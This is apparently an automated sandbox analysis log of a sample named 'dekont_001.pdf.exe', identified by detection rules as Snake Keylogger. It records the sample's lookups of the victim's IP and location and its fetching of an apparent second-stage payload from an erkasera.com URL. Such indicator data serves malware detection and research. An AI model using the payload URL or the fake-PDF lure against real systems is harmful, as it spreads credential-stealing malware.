              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49754 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /ruurew/Ktanfonto.vdf HTTP/1.1Host: erkasera.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /ruurew/Ktanfonto.vdf HTTP/1.1Host: erkasera.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: erkasera.com
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: InstallUtil.exe, 00000001.00000002.4215771932.000000000300B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000003038000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C82000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
              Source: InstallUtil.exe, 00000001.00000002.4215771932.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000003019000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.000000000300B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000003038000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C82000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C62000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002B8C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: InstallUtil.exe, 00000001.00000002.4215771932.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: dekont_001.pdf.exe, 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.000000000364C000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: InstallUtil.exe, 00000001.00000002.4215771932.000000000300B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F67000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000003038000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C82000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C39000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
              Source: dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002831000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002831000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://erkasera.com
              Source: dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002831000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://erkasera.com/ruurew/Ktanfonto.vdf
              Source: dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
              Source: dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
              Source: dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
              Source: InstallUtil.exe, 00000001.00000002.4215771932.000000000300B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000003038000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C82000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: dekont_001.pdf.exe, 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.000000000364C000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002B98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: InstallUtil.exe, 00000007.00000002.4215341701.0000000002C39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.188
              Source: InstallUtil.exe, 00000001.00000002.4215771932.000000000300B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000003038000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C82000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.188$
              Source: dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
              Source: dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1830048122.00000000028DF000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.000000000328F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownHTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.4:49746 version: TLS 1.2

              System Summary

              barindex
              Source: 0.2.dekont_001.pdf.exe.3839550.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.dekont_001.pdf.exe.3839550.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.dekont_001.pdf.exe.3839550.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.dekont_001.pdf.exe.3839550.4.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000006.00000002.2012152493.000000000364C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: dekont_001.pdf.exe PID: 7304, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: dekont_001.pdf.exe PID: 7304, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: InstallUtil.exe PID: 7452, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: InstallUtil.exe PID: 7452, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: RequiredContract.exe PID: 7844, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: RequiredContract.exe PID: 7844, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: initial sampleStatic PE information: Filename: dekont_001.pdf.exe
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeCode function: 0_2_026EE6400_2_026EE640
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeCode function: 0_2_026EE6310_2_026EE631
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeCode function: 0_2_0711E4900_2_0711E490
